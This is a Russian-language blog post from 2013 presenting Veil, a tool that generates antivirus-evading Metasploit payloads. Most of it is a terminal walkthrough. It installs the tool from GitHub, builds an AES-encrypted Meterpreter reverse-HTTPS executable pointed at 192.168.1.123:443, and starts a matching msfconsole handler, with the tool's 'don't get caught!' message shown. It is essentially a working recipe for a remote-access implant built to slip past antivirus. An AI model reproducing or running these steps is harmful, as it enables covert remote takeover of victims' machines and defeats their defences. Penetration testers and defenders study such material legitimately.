3 Июня, 2013

A Payload Generator to Bypass Antivirus

Dmitriy Evteev
Очередной "булыжник" в сторону большинства современных аверов демонстрирует сборка под названием Veil . Этот волшебный тулкит представляет из себя генератор полезной нагрузки совместимый с MSF (базируется на msfvenom ). После окончательной сборки через  Pyinstaller или  Py2Exe  полученная бинарь в настоящее время распознается  только двумя антивирусными решениями (и не самыми популярными...).

name='more'>

Установка и использование


"- Kali
- Backtrack
- Kali
- Backtrack
- Okay, take both" (c) anonymous

# git clone https://github.com/ChrisTruncer/Veil.git
# cd Veil/setup
# ./setup.sh
...
# ./Veil.py

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What payload type would you like to use?

 1 - Meterpreter - Python - void pointer
 2 - Meterpreter - Python - VirtualAlloc()
 3 - Meterpreter - Python - base64 Encoded
 4 - Meterpreter - Python - Letter Substitution
 5 - Meterpreter - Python - ARC4 Stream Cipher
 6 - Meterpreter - Python - DES Encrypted
 7 - Meterpreter - Python - AES Encrypted
 8 - Meterpreter - C - void pointer
 9 - Meterpreter - C - VirtualAlloc()
 0 - Exit Veil

[>] Please enter the number of your choice: 7

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] Use msfvenom or supply custom shellcode?

 1 - msfvenom (default)
 2 - Custom

[>] Please enter the number of your choice: 1

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] What type of payload would you like?

 1 - Reverse TCP
 2 - Reverse HTTP
 3 - Reverse HTTPS
 0 - Main Menu

[>] Please enter the number of your choice: 3
[?] What's the Local Host IP Address: 192.168.1.123
[?] What's the Local Port Number: 443
[*] Generating shellcode...

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[?] How would you like to create your payload executable?

 1 - Pyinstaller (default)
 2 - Py2Exe

[>] Please enter the number of your choice: 1

55 INFO: wrote Z:rootvVeilpayload.spec
...
8134 INFO: Appending archive to EXE Z:rootvVeildistpayload.exe

=========================================================================
 Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================

[!] Be sure to set up a Reverse HTTPS handler with the following settings:

 PAYLOAD = windows/meterpreter/reverse_https
 LHOST   = 192.168.1.123
 LPORT   = 443

[!] Your payload files have been generated, don't get caught!

# file payload.exe 
payload.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
...
# msfconsole
msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://192.168.1.123:443/
[*] Starting the payload handler...